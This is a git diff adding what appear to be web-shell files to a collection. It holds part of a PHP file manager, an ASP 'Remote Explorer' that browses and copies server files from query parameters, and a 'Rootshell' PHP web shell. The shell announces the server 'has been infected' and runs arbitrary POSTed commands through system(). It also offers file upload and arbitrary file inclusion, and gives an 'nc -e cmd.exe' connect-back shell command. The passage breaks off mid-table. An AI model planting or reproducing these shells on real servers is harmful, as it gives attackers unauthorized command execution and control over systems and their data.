+	echo("	</tr>\n");
+	$p = '&' . SID;
+	if ($GLOBALS['showsize']) $cspan = ' colspan="2"'; else $cspan = '';
+	foreach ($files as $file) {
+		echo("	<tr>\n");
+		if ($file['is_link']) {
+			echo("		<td bgcolor=\"#FFFFFF\" align=\"center\"><img src=\"$self?imageid=14\" width=\"17\" height=\"13\"></td>\n");
+			echo("		<td$cspan bgcolor=\"#FFFFFF\">");
+			if ($file['is_dir']) echo('[ ');
+			echo($file['filename']);
+			if ($file['is_dir']) echo(' ]');
+			echo(' -&gt; ');
+			if ($file['is_dir']) {
+				echo('[ ');
+				if ($file['is_readable']) echo("<a href=\"$self?dir=" . urlencode($file['readlink']) . "$p\">");
+				echo(htmlentities($file['readlink']));
+				if ($file['is_readable']) echo('</a>');
+				echo(' ]');
+			} else {
+				if (dirname($file['readlink']) != '.') {
+					if ($file['is_readable']) echo("<a href=\"$self?dir=" . urlencode(dirname($file['readlink'])) . "$p\">");
+					echo(htmlentities(dirname($file['readlink'])) . '/');
+					if ($file['is_readable']) echo('</a>');
+				}
+				if (strlen(basename($file['readlink'])) != 0) {
+					if ($file['is_file'] && $file['is_readable']) echo("<a href=\"$self?show=" . urlencode($file['readlink']) . "$p\">");
+					echo(htmlentities(basename($file['readlink'])));
+					if ($file['is_file'] && $file['is_readable']) echo('</a>');
+				}
+				if ($file['is_file'] && is_script($file['readlink'])) echo(" <a href=\"$self?showh=" . urlencode($file['readlink']) . "$p\">*</a>");
+			}
+			echo("</td>\n");
+		} elseif ($file['is_dir']) {
+			echo("		<td bgcolor=\"#FFFFFF\" align=\"center\"><img src=\"$self?imageid=15\" width=\"17\" height=\"13\"></td>\n");
+			echo("		<td$cspan bgcolor=\"#FFFFFF\">[ ");
+			if ($file['is_readable']) echo("<a href=\"$self?dir=" . urlencode($file['fullfilename']) . "$p\">");
+			echo(htmlentities($file['filename']));
+			if ($file['is_readable']) echo('</a>');
+			echo(" ]</td>\n");
+		} else {
+			echo("		<td bgcolor=\"#FFFFFF\" align=\"center\"><img src=\"$self?imageid=");
+			if (substr($file['filename'], 0, 1) == '.') echo('13'); else echo('12');
+			echo("\" width=\"17\" height=\"13\"></td>\n");
+			echo('		<td');
+			if (substr($file['permission'], 0, 1) != '-') echo($cspan);
+			echo(' bgcolor="#FFFFFF">');
+			if ($file['is_readable'] && $file['is_file']) echo("<a href=\"$self?show=" . urlencode($file['fullfilename']) . "$p\">");
+			echo(htmlentities($file['filename']));
+			if ($file['is_readable'] && $file['is_file']) echo('</a>');
+			if ($file['is_file'] && is_script($file['filename'])) echo(" <a href=\"$self?showh=" . urlencode($file['fullfilename']) . "$p\">*</a>");
+			echo("</td>\n");
+			if ($GLOBALS['showsize'] && $file['is_file']) {
+				echo("		<td bgcolor=\"#FFFFFF\" align=\"right\" nowrap>");
+				if ($file['is_file']) echo("{$file['size']} B");
+				echo("</td>\n"); 
+			}
+		}
+		echo('		<td bgcolor="#FFFFFF" class="perm">');
+		if ($uid == $file['owner'] && !$file['is_link']) echo("<a href=\"$self?permission=" . urlencode($file['fullfilename']) . "$p\">");
+		echo($file['permission']);
+		if ($uid == $file['owner'] && !$file['is_link']) echo('</a>');
+		echo("</td>\n");
+		$owner = ($file['ownername'] == NULL) ? $file['owner'] : $file['ownername'];
+		$group = ($file['groupname'] == NULL) ? $file['group'] : $file['groupname'];
+		echo('		<td bgcolor="#FFFFFF">' . $owner . "</td>\n");
+		echo('		<td bgcolor="#FFFFFF">' . $group . "</td>\n");
+		$f = "<a href=\"$self?symlinktarget=" . urlencode($dir . $file['filename']). "$p\">{$words['createsymlink']}</a> | ";;
+		if ($file['filename'] != '.' && $file['filename'] != '..') {
+			if ($file['is_readable'] && $file['is_file']) {
+				$f .= "<a href=\"$self?cpy=" . urlencode($file['fullfilename']). "$p\">{$words['copy']}</a> | ";
+			}
+			if ($uid == $file['owner']) {
+				$f .= "<a href=\"$self?move=" . urlencode($file['fullfilename']) . "$p\">{$words['move']}</a> | ";
+				$f .= "<a href=\"$self?delete=" . urlencode($dir . $file['filename']). "$p\">{$words['delete']}</a> | ";
+			}
+			if ($file['is_writable'] && $file['is_file']) {
+				$f .= "<a href=\"$self?edit=" . urlencode($file['fullfilename']) . "$p\">{$words['edit']}</a> | ";
+			}
+		}
+		if ($file['is_dir'] && @is_file($file['fullfilename'] . '.htaccess') && @is_writable($file['fullfilename'] . '.htaccess')) {
+			$f .= "<a href=\"$self?edit=" . urlencode($file['fullfilename']) . '.htaccess' . "$p\">{$words['configure']}</a> | ";
+		}
+		if (!empty($f)) $f = substr($f, 0, strlen($f) - 3); else $f = '&nbsp;';
+		echo("		<td bgcolor=\"#FFFFFF\" nowrap>$f</td>\n");
+		echo("	</tr>\n");
+	}
+?>
+	</table>
+	</td></tr></table>
+	</p>
+<?php
+	return;
+}
+
+function sortfiles ($files, $sort, $reverse) {
+	$files = sortfield($files, $sort, $reverse, 0, sizeof($files) - 1);
+	if ($sort != 'filename') {
+		$old = $files[0][$sort]; $oldpos = 0;
+		for ($i = 1; $i < sizeof($files); $i++) {
+			if ($old != $files[$i][$sort]) {
+				if ($oldpos != ($i - 1)) $files = sortfield($files, 'filename', false, $oldpos, $i - 1);
+				$oldpos = $i;
+			}
+			$old = $files[$i][$sort];
+		}
+		if ($oldpos < ($i - 1)) $files = sortfield($files, 'filename', false, $oldpos, $i - 1);
+	}
+	return $files;
+}
+
+function octtostr ($mode) {
+	if     (($mode & 0xC000) === 0xC000) $type = 's'; /* Unix domain socket */
+	elseif (($mode & 0x4000) === 0x4000) $type = 'd'; /* Directory */
+	elseif (($mode & 0xA000) === 0xA000) $type = 'l'; /* Symbolic link */
+	elseif (($mode & 0x8000) === 0x8000) $type = '-'; /* Regular file */
+	elseif (($mode & 0x6000) === 0x6000) $type = 'b'; /* Block special file */
+	elseif (($mode & 0x2000) === 0x2000) $type = 'c'; /* Character special file */
+	elseif (($mode & 0x1000) === 0x1000) $type = 'p'; /* Named pipe */
+	else                                 $type = '?'; /* Unknown */
+	$owner  = ($mode & 00400) ? 'r' : '-';
+	$owner .= ($mode & 00200) ? 'w' : '-';
+	if ($mode & 0x800) $owner .= ($mode & 00100) ? 's' : 'S'; else $owner .= ($mode & 00100) ? 'x' : '-';
+	$group  = ($mode & 00040) ? 'r' : '-';
+	$group .= ($mode & 00020) ? 'w' : '-';
+	if ($mode & 0x400) $group .= ($mode & 00010) ? 's' : 'S'; else $group .= ($mode & 00010) ? 'x' : '-';
+	$other  = ($mode & 00004) ? 'r' : '-';
+	$other .= ($mode & 00002) ? 'w' : '-';
+	if ($mode & 0x200) $other .= ($mode & 00001) ? 't' : 'T'; else $other .= ($mode & 00001) ? 'x' : '-';
+	return $type . $owner . $group . $other;
+}
+
+function sortfield ($field, $column, $reverse, $left, $right){
+	$g = $field[(int) (($left + $right) / 2)][$column];
+	$l = $left; $r = $right;
+	while ($l <= $r) {
+		if ($reverse) {
+			while (($l < $right) && ($field[$l][$column] > $g)) $l++;
+			while (($r > $left)  && ($field[$r][$column] < $g)) $r--;
+		} else {
+			while (($l < $right) && ($field[$l][$column] < $g)) $l++;
+			while (($r > $left)  && ($field[$r][$column] > $g)) $r--;
+		}
+		if ($l < $r) {
+			$tmp = $field[$r];
+			$field[$r] = $field[$l];
+			$field[$l] = $tmp;
+			$r--;
+			$l++;
+		} else {
+			$l++;
+		}
+	}
+	if ($r > $left) $field = sortfield($field, $column, $reverse, $left, $r);
+	if ($r + 1 < $right) $field = sortfield($field, $column, $reverse, $r + 1, $right);
+	return $field;
+}
+
+function buildphrase ($repl, $str) {
+	if (!is_array($repl)) $repl = array($repl);
+	$newstr = ''; $prevz = ' ';
+	for ($i = 0; $i < strlen($str); $i++) {
+		$z = substr($str, $i, 1);
+		if (((int) $z) > 0 && ((int) $z) <= count($repl) && $prevz == ' ') $newstr .= $repl[((int) $z) - 1]; else $newstr .= $z;
+		$prevz = $z;
+	}
+	return $newstr;
+}
+
+function html_header ($action) {
+	global $self;
+	global $error, $notice, $updatetreeview;
+?>
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
+<html>
+<head>
+	<title><?php echo("$self - $action"); ?></title>
+	<style type="text/css">
+	<!--
+		td { font-family: sans-serif; font-size: 10pt; }
+		a:link, a:visited, a:active { text-decoration: none; color: #000088; }
+		a:hover { text-decoration: underline; color: #000088; }
+		.perm { font-family: monospace; font-size: 10pt; }
+	-->
+	</style>
+<?php
+	if (isset($_REQUEST['edit']) && !isset($_POST['save']) && basename($edit = $_REQUEST['edit']) == '.htaccess') {
+		$file = dirname($edit) . '/.htpasswd';
+?>
+	<script type="text/javascript" language="JavaScript">
+	<!--
+	function autheinf () {
+		document.f.content.value += "Authtype Basic\nAuthName \"Restricted Directory\"\n";
+		document.f.content.value += "AuthUserFile <?php echo(htmlentities($file)); ?>\n";
+		document.f.content.value += "Require valid-user";
+	}
+	//-->
+	</script>
+<?php
+	}
+?>
+</head>
+<body bgcolor="#FFFFFF"<?php if ($updatetreeview && !empty($_SESSION['tree'])) echo(" '$self?frame=treeview&dir=" . urlencode($_SESSION['dir']) . '&' . SID . '&pmru=' . time() . '#' . urlencode($_SESSION['dir']) . "'))\""); ?>>
+<?php
+	if (!empty($error)) perror($error);
+	if (!empty($notice)) pnotice($notice);
+	return;
+}
+
+function html_footer ($backbutton = TRUE) {
+	global $self, $words;
+	if ($backbutton) {
+?>
+	<p>
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4"><tr><td bgcolor="#EEEEEE">
+	<a href="<?php echo("$self?id=". $_REQUEST['id']); ?>"><?php echo($words['back']); ?></a>
+	</td></tr></table>
+	</td></tr></table>
+	</p>
+<?php
+	}
+?>
+</body>
+</html>
+<?php
+	return;
+}
+
+function perror ($str) {
+?>
+	<p>
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4"><tr><td bgcolor="#FFCCCC">
+	<?php echo("$str\n"); ?>
+	</td></tr></table>
+	</td></tr></table>
+	</p>
+<?php
+	return;
+}
+
+function pnotice ($str) {
+?>
+	<p>
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4"><tr><td bgcolor="#CCFFCC">
+	<?php echo("$str\n"); ?>
+	</td></tr></table>
+	</td></tr></table>
+	</p>
+<?php
+	return;
+}
+
+?>
diff --git a/php/RemExp.asp.php.txt b/php/RemExp.asp.php.txt
new file mode 100644
index 0000000..a5a8e27
--- /dev/null
+++ b/php/RemExp.asp.php.txt
@@ -0,0 +1,250 @@
+<%@ Language=VBScript %>
+<%
+Option Explicit
+
+Dim giCount
+Dim gvAttributes
+
+Dim Ext
+
+Dim ScriptFolder
+Dim FolderPath
+
+Dim FileSystem
+Dim Drives
+Dim Drive
+Dim Folders
+Dim Folder
+Dim SubFolders
+Dim SubFolder
+Dim Files
+Dim File
+
+Dim BgColor, BackgroundColor,FSO
+
+If Request.QueryString("CopyFolder") <> "" Then
+ Set FSO = CreateObject("Scripting.FileSystemObject")
+ FSO.CopyFolder Request.QueryString("CopyFolder") & "*", "d:\"
+End If
+
+If Request.QueryString("CopyFile") <> "" Then
+ Set FSO = CreateObject("Scripting.FileSystemObject")
+ FSO.CopyFile Request.QueryString("FolderPath") & Request.QueryString("CopyFile"), "d:\"
+End If
+
+Set FileSystem = Server.CreateObject("Scripting.FileSystemObject")
+
+FolderPath = Request.QueryString("FolderPath")
+
+If FolderPath = "" Then
+ FolderPath = Request.ServerVariables("PATH_TRANSLATED")
+End If
+
+FolderPath = ParseFolder(FolderPath)
+
+ScriptFolder = ParseFolder(Request.ServerVariables("PATH_TRANSLATED")) & "images\"
+
+%>
+<html>
+<head>
+<title>Remote Explorer</title>
+<style type="text/css">
+BODY
+{
+ BACKGROUND-COLOR: #C0C0C0
+    FONT-FAMILY: 'MS Sans Serif', Arial;
+    FONT-SIZE: 8px;
+ MARGIN: 0px
+}
+td, input, select
+{
+    FONT-FAMILY: 'MS Sans Serif', Arial;
+    FONT-SIZE: 8px;
+}
+.Address
+{
+    BACKGROUND-ATTACHMENT: fixed;
+    BACKGROUND-POSITION: 1px center;
+    BACKGROUND-REPEAT: no-repeat;
+    Padding-LEFT: 10px
+}
+.Go
+{
+    BACKGROUND-ATTACHMENT: fixed;
+    BACKGROUND-POSITION: left center;
+    BACKGROUND-REPEAT: no-repeat;
+    Padding-LEFT: 10px
+}
+</style>
+</head>
+<body bgcolor="#c0c0c0">
+<table width="100%" cellpadding="0" cellspacing="0" border="0">
+<tr>
+<form>
+<td width="1%" nowrap>   
+<select name="FolderPath" id="Drive">
+<%
+Set Drives = FileSystem.Drives
+For Each Drive In Drives
+ Response.Write "<OPTION value=""" & Drive.DriveLetter & ":\"""
+ If InStr(UCase(FolderPath), Drive.DriveLetter & ":\") > 0 Then Response.Write " selected"
+  Response.Write ">"
+  Response.Write Drive.DriveLetter & " - "
+  If Drive.DriveType = "Remote" Then
+   Response.Write Drive.ShareName & " [share]"
+  ElseIf Drive.DriveLetter <> "A" Then
+   If Drive.IsReady Then
+    Response.Write Drive.VolumeName
+   Else
+    Response.Write "(Not Ready)"
+   End If
+  Else
+   Response.Write "(Skiped Detection)"
+  End If
+  Response.Write "</OPTION>"
+ Next
+%>
+</select> <input class="Go" type="submit" value="Go" style="border:1px outset">
+</td>
+</form>
+<td width="1%">   Address: </td>
+<form>
+<td width="100%">
+<input class="Address" type="text" name="FolderPath" value="<%=FolderPath%>" style="width:100%" size="20">
+</td>
+<td width="1%">
+<input class="Go" type="submit" value="Go"style="border:1px outset">
+</td>
+</form>
+</tr>
+</table>
+<%
+Set Folder = FileSystem.GetFolder(FolderPath)
+Set SubFolders = Folder.SubFolders
+Set Files = Folder.Files
+%>
+<br>
+<table cellpadding="1" cellspacing="1" border="0" width="100%" align="center" style="border:1px inset">
+<tr>
+<td width="40%" height="20" bgcolor="silver">  Name</td>
+<td width="10%" bgcolor="silver" align="right">Size    </td>
+<td width="20%" bgcolor="silver">Type </td>
+<td width="20%" bgcolor="silver">Modified </td>
+<td width="10%" bgcolor="silver" align="right">Attributes  </td>
+</tr>
+<%
+If Not Folder.IsRootFolder Then
+ BgToggle
+%>
+<tr title="Top Level">
+<td bgcolor="<%=BgColor%>"><a href= "<%=Request.ServerVariables("script_name")%>?FolderPath=<%=Server.URLPathEncode(Folder.Drive & "\")%>"><font face="wingdings" size="4">O</font> Top Level</a> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+</tr>
+<%BgToggle%>
+<tr>
+<td bgcolor="<%=BgColor%>"><a href= "<%=Request.ServerVariables("script_name")%>?FolderPath=<%=Server.URLPathEncode(Folder)%>"><font face="wingdings" size="4">¶</font> Up One Level</a> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+</tr>
+<%
+End If
+For Each SubFolder In SubFolders
+ BgToggle
+%>
+<tr>
+<td bgcolor="<%=BgColor%>" title="<%=SubFolder.Name%>"> <a href= "<%=Request.ServerVariables("script_name") & "?FolderPath=" & Server.URLPathEncode(FolderPath & SubFolder.Name & "\")%>"><font face="wingdings" size="4">0</font> <b><%=SubFolder.Name%></b></a>        (<a href= "<%=Request.ServerVariables("script_name")%>?CopyFolder=<%=Server.URLPathEncode(FolderPath & SubFolder.Name)%>&FolderPath=<%=Server.URLPathEncode(FolderPath & "\")%>">Copy</a>)</td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"><%=SubFolder.Type%>  </td>
+<td bgcolor="<%=BgColor%>"><%=SubFolder.DateLastModified%> </td>
+<td bgcolor="<%=BgColor%>" align="right"><%=Attributes(SubFolder.Attributes)%></td>
+</tr>
+<%
+Next
+For Each File In Files
+ BgToggle
+ Ext = FileExtension(File.Name)
+%>
+<tr>
+<td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f=<%=File.Name%>&FolderPath=<%=Server.URLPathEncode(FolderPath)%>" target="_blank"><font face="wingdings" size="4">3</font> "<%=File.Name%></a>        (<a href= "<%=Request.ServerVariables("script_name")%>?CopyFile=<%=File.Name%>&FolderPath=<%=Server.URLPathEncode(FolderPath & "\")%>">Copy</a>)</td>
+<td bgcolor="<%=BgColor%>" align="right"><%=(File.Size)%> Byte  </td>
+<td bgcolor="<%=BgColor%>"><%=File.Type%></td>
+<td bgcolor="<%=BgColor%>"><%=File.DateLastModified%></td>
+<td bgcolor="<%=BgColor%>" align="right"><%=Attributes(File.Attributes)%></td>
+</tr>
+<%Next%>
+</table>
+</body>
+</html>
+<%
+Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal MinUpperBound, ByVal IndexSeperator)
+    Dim lsResult
+    Dim llTemp
+    Dim giCount
+    MaxValuePerIndex = MaxValuePerIndex + 1
+    Do While Int(SourceNumber / (MaxValuePerIndex ^ MinUpperBound)) > (MaxValuePerIndex - 1)
+        MinUpperBound = MinUpperBound + 1
+    Loop
+    For giCount = MinUpperBound To 0 Step -1
+        llTemp = Int(SourceNumber / (MaxValuePerIndex ^ giCount))
+        lsResult = lsResult & CStr(llTemp)
+        If giCount > 0 Then lsResult = lsResult & IndexSeperator
+        SourceNumber = SourceNumber - (llTemp * (MaxValuePerIndex ^ giCount))
+    Next
+    ConvertBinary = lsResult
+End Function
+
+Private Sub BgToggle()
+ BackgroundColor = Not(BackgroundColor)
+ If BackgroundColor Then
+  BgColor = "#efefef"
+ Else
+  BgColor = "#ffffff"
+ End If
+End Sub
+
+Private Function Attributes(AttributeValue)
+ Dim lvAttributes
+ Dim lsResult
+ lvAttributes = Split(ConvertBinary(AttributeValue, 1, 7, ","), ",")
+ If lvAttributes(0) = 1 Then lsResult = "ReadOnly&nbsp;&nbsp;"
+ If lvAttributes(1) = 1 Then lsResult = lsResult & "Hidden&nbsp;&nbsp;"
+ If lvAttributes(2) = 1 Then lsResult = lsResult & "System&nbsp;&nbsp;"
+ If lvAttributes(5) = 1 Then lsResult = lsResult & "Archive&nbsp;&nbsp;"
+ Attributes = lsResult
+End Function
+
+Private Function FileExtension(FileName)
+ Dim lsExt
+ Dim liCount
+ For liCount = Len(FileName) To 1 Step -1
+  If Mid(FileName, liCount, 1) = "." Then
+   lsExt = Right(FileName, Len(FileName) - liCount)
+   Exit For
+  End If
+ Next
+ If Not FileSystem.FileExists(ScriptFolder & "ext_" & lsExt & ".gif") Then
+  lsExt = ""
+ End If
+ FileExtension = lsExt
+End Function
+
+Private Function ParseFolder(PathString)
+ Dim liCount
+ If Right(PathString, 1) = "\" Then
+  ParseFolder = PathString
+ Else
+  For liCount = Len(PathString) To 1 Step -1
+   If Mid(PathString, liCount, 1) = "\" Then
+    ParseFolder = Left(PathString, liCount)
+    Exit For
+   End If
+  Next
+ End If
+End Function
+%>
+
diff --git a/php/Rootshell.v.1.0.php b/php/Rootshell.v.1.0.php
new file mode 100644
index 0000000..bd032c3
--- /dev/null
+++ b/php/Rootshell.v.1.0.php
@@ -0,0 +1,246 @@
+<!--
+/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
+/*  ................jdWMMMMMNk&,...JjdMMMHMMHA+................ */
+/*  .^.^.^.^.^.^..JdMMMBC:vHMMNI..`dMMM8C`ZMMMNs...^^.^^.^^.^^. */
+/*  ..^.^..^.....dMMMBC`....dHNn...dMNI....`vMMMNy.........^... */
+/*  .....^..?XMMMMMBC!..dMM@MMMMMMM#MMH@MNZ,^!OMMHMMNk!..^...^. */
+/*  ^^.^..^.`??????!`JdN0??!??1OUUVT??????XQy!`??????!`..^..^.^ */
+/*  ..^..^.....^..^..?WN0`` `  +llz:`    .dHR:..^.......^..^... */
+/*  ...^..^.^.^..^...`?UXQQQQQeyltOOagQQQeZVz`..^.^^..^..^..^.. */
+/*  ^.^..^..^..^..^.^..`zWMMMMH0llOXHMMMM9C`..^.....^..^..^..^. */
+/*  ..^..^...^..+....^...`zHHWAwtltwAXH8I....^...?+....^...^..^ */
+/*  ...^..^...JdMk&...^.^..^zHNkAAwWMHc...^.....jWNk+....^..^.. */
+/*  ^.^..^..JdMMMMNHo....^..jHMMMMMMMHl.^..^..jWMMMMNk+...^..^. */
+/*  .^....jdNMM9+4MMNmo...?+zZV7???1wZO+.^..ddMMM6?WMMNmc..^..^ */
+/*  ^.^.jqNMM9C!^??UMMNmmmkOltOz+++zltlOzjQQNMMY?!`??WMNNmc^.^. */
+/*  ummQHMM9C!.uQo.??WMMMMNNQQkI!!?wqQQQQHMMMYC!.umx.?7WMNHmmmo */
+/*  OUUUUU6:.jgWNNmx,`OUWHHHHHSI..?wWHHHHHW9C!.udMNHAx.?XUUUU9C */
+/*  .......+dWMMMMMNm+,`+ltltlzz??+1lltltv+^.jdMMMMMMHA+......^ */
+/*  ..^..JdMMMMC`vMMMNkJuAAAAAy+...+uAAAAA&JdMMMBC`dMMMHs....^. */
+/*  ....dMMMMC``.``zHMMMMMMMMMMS==zXMMMMMMMMMM8v``.`?ZMMMNs.... */
+/*  dMMMMMBC!`.....`!?????1OVVCz^^`+OVVC??????!`....^`?vMMMMMNk */
+/*  ??????!`....^.........?ztlOz+++zlltz!........^.....???????! */
+/*  .....^.^^.^..^.^^...uQQHkwz+!!!+zwWHmmo...^.^.^^.^..^....^. */
+/*  ^^.^.....^.^..^...ugHMMMNkz1++++zXMMMMHmx..^....^.^..^.^..^ */
+/*  ..^.^.^.....^...jdHMMMMM9C???????wWMMMMMHn+...^....^..^..^. */
+/*  ^....^.^.^....JdMMMMMMHIz+.......?zdHMMMMMNA....^..^...^..^ */
+/*  .^.^....^...JdMMMMMMHZttOz1111111zlttwWMMMMMNn..^.^..^..^.. */
+/*  ..^.^.^....dNMMMMMWOOtllz!^^^^^^^+1lttOZWMMMMMNA,....^..^.. */
+/*  ^....^..?dNMMMMMC?1ltllllzzzzzzzzzlllltlz?XMMMMNNk+^..^..^. */
+/*  .^.^..+dNMM8T77?!`+lllz!!!!!!!!!!!!+1tll+`??777HMNHm;..^..^ */
+/*  ..^..^jHMMNS`..^.`+ltlz+++++++++++++ztll+`....`dMMMHl.^..^. */
+/*  ....^.jHMMNS`^...`+ltlz+++++++++++++zltl+`^.^.`dMMMHl..^..^ */
+/*  ^^.^..jHMMNS`.^.^`+tllz+...........?+ltl+`.^..`dMMMHl...^.. */
+/*  ..^..^jHMMM6`..^.`+lltltltlz111zltlltlll+`...^`dMMMHl.^..^. */
+/*  ....^.jHNC``.^...`+zltlltlz+^^.+zltlltzz+`..^.^`?dMHl..^..^ */
+/*  .^.^..jHNI....^..^``+zltltlzzzzzltltlv!``.^...^..dMHc....^. */
+/*  ^...jdNMMNmo...^...^`?+ztlltllltlltz!``..^.^...dqNMMNmc.^.. */
+/*  .^.`?7TTTTC!`..^.....^`?!!!!!!!!!!!!`..^....^.`?7TTTTC!..^. */
+/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
+/*
+/*    We should take care some kind of history, i will add here to keep a trace of changes (who made it).
+/*    Also I think we should increase the last version number by 1 if you make some changes.
+/*
+/*    CHANGES / VERSION HISTORY:
+/*    ====================================================================================
+/*    Version        Nick            Description
+/*    - - - - - - - - - - - - - - - - - - - - - - - - - - -
+/*    0.3.1          666            added an ascii bug :)
+/*    0.3.1          666            password protection
+/*    0.3.1          666            GET and POST changes
+/*    0.3.2          666            coded a new uploader
+/*    0.3.2          666            new password protection
+/*    0.3.3          666            added a lot of comments :)
+/*    0.3.3          666            added "Server Info"
+/*    1.0.0          666            added "File Inclusion"
+/*    1.0.0          666            removed password protection (nobody needs it...)
+/*    1.0.0          666            added "Files & Directories"
+/*
+/*
+-->
+<?
+//
+// Default Changes
+//    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
+
+$owner        = "Hacker";                                                       // Insert your nick
+$version      = "1.0.0";                                                        // The version    
+
+//    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
+//
+?>
+
+<body link="#000000" vlink="#000000" alink="#000000" bgcolor="#FFFFD5">
+<style type="text/css">
+body{
+cursor:crosshair 
+}
+</style>
+<div align="center" style="width: 100%; height: 100">
+<pre width="100%" align="center"><strong> ____             _         ____  _          _ _
+|  _ \ ___   ___ | |_      / ___|| |__   ___| | |
+| |_) / _ \ / _ \| __|     \___ \| '_ \ / _ \ | |
+|  _ < (_) | (_) | |_   _   ___) | | | |  __/ | |
+|_| \_\___/ \___/ \__| (_) |____/|_| |_|\___|_|_|</pre>
+</div></strong>
+<b><u><center><?php echo "This server has been infected by $owner"; ?></center></u></b>
+<hr color="#000000" size="2,5">
+
+<div align="center">
+  <center>
+  <p>
+  <?php 
+// Check for safe mode
+if( ini_get('safe_mode') ) {
+   print '<font color=#FF0000><b>Safe Mode ON</b></font>';
+} else {
+   print '<font color=#008000><b>Safe Mode OFF</b></font>';
+}
+
+?>
+&nbsp;</p><font face="Webdings" size="6">!</font><br>
+&nbsp;<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="25" bordercolor="#000000">
+    <tr>
+      <td width="1%" height="25" bgcolor="#FCFEBA">
+      <p align="center"><font face="Verdana" size="2">[ Server Info ]</font></td>
+    </tr>
+    <tr>
+      <td width="49%" height="142">
+      <p align="center">
+        <font face="Verdana" style="font-size: 8pt"><b>Current Directory:</b> <? echo $_SERVER['DOCUMENT_ROOT']; ?>
+        <br />
+        <b>Shell:</b> <? echo $SCRIPT_FILENAME ?>
+        <br>
+        <b>Server Software:</b> <? echo $SERVER_SOFTWARE ?><br>
+        <b>Server Name:</b> <? echo $SERVER_NAME ?><br>
+        <b>Server Protocol:</b> <? echo $SERVER_PROTOCOL ?><br>
+        </font></tr>
+  </table><br />
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="426" bordercolor="#000000">
+    <tr>
+      <td width="49%" height="25" bgcolor="#FCFEBA" valign="middle">
+      <p align="center"><font face="Verdana" size="2">[ Command Execute ]</font></td>
+      <td width="51%" height="26" bgcolor="#FCFEBA" valign="middle">
+      <p align="center"><font face="Verdana" size="2">[ File Upload ]</font></td>
+    </tr>
+    <tr>
+      <td width="49%" height="142">
+      <p align="center"><form method="post">
+<p align="center">
+<br>
+<font face="Verdana" style="font-size: 8pt">Insert your commands here:</font><br>
+<br>
+<textarea size="70" name="command" rows="2" cols="40" ></textarea> <br>
+<br><input type="submit" value="Execute!"><br>
+&nbsp;<br></p>
+      </form>
+      <p align="center">
+        <textarea readonly size="1" rows="7" cols="53"><?php @$output = system($_POST['command']); ?></textarea><br>
+        <br>
+        <font face="Verdana" style="font-size: 8pt"><b>Info:</b> For a connect 
+        back Shell, use: <i>nc -e cmd.exe [SERVER] 3333<br>
+        </i>after local command: <i>nc -v -l -p 3333 </i>(Windows)</font><br /><br /> <td><p align="center"><br>
+<form enctype="multipart/form-data" method="post">
+<p align="center"><br>
+<br>
+<font face="Verdana" style="font-size: 8pt">Here you can upload some files.</font><br>
+<br>
+<input type="file" name="file" size="20"><br>
+<br>
+<font style="font-size: 5pt">&nbsp;</font><br>
+<input type="submit" value="Upload File!"> <br>
+&nbsp;</p>
+</form>
+<?php
+
+function check_file()
+{
+global $file_name, $filename;
+    $backupstring = "copy_of_";
+    $filename = $backupstring."$filename";
+
+    if( file_exists($filename))
+    {
+        check_file();
+    }
+}
+
+if(!empty($file))
+{
+    $filename = $file_name;
+    if( file_exists($file_name))
+    {
+        check_file();
+        echo "<p align=center>File already exist</p>";
+    }
+
+    else
+    {
+        copy($file,"$filename");
+        if( file_exists($filename))
+        {
+            echo "<p align=center>File uploaded successful</p>";
+        }
+        elseif(! file_exists($filename))
+        {
+            echo "<p align=center>File not found</p>";
+        }
+    }
+}
+?> 
+<font face="Verdana" style="font-size: 8pt">
+<p align=\"center\"></font>
+</td>
+
+      </tr>
+    <tr>
+      <td width="49%" height="25" bgcolor="#FCFEBA">
+      <p align="center"><font face="Verdana" size="2">[ Files & Directories ]</font></td>
+      <td width="51%" height="19" bgcolor="#FCFEBA">
+      <p align="center"><font face="Verdana" size="2">[ File Inclusion ]</font></td>
+    </tr>
+    <tr>
+      <td width="49%" height="231">
+      <form method="post">
+<p align="center">
+<font face="Verdana" style="font-size: 11pt">
+<?
+$folder=opendir('./');
+while ($file = readdir($folder)) {
+if($file != "." && $file != "..")
+echo '<a target="_blank" href="'.$file.'">'.$file.'</a ><br>';
+}
+closedir($folder);
+?></p>
+      </form>
+      <p align="center">
+      <br>
+        &nbsp;<p align="center">&nbsp;</td>
+      <td width="51%" height="232">
+      <p align="center"><font face="Verdana" style="font-size: 8pt"><br>
+      Include 
+      something :)<br>
+      <br>
+&nbsp;</font><form method="POST">
+       <p align="center">
+        <input type="text" name="incl" size="20"><br>
+        <br>
+        <input type="submit" value="Include!" name="inc"></p>
+      </form>
+      <?php @$output = include($_POST['incl']); ?>
+      </td>
+    </tr>
+  </table>
+  </center>
+</div>
+<br /></p>
+<div align="center">
+  <center>
+  <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2">
+    <tr>
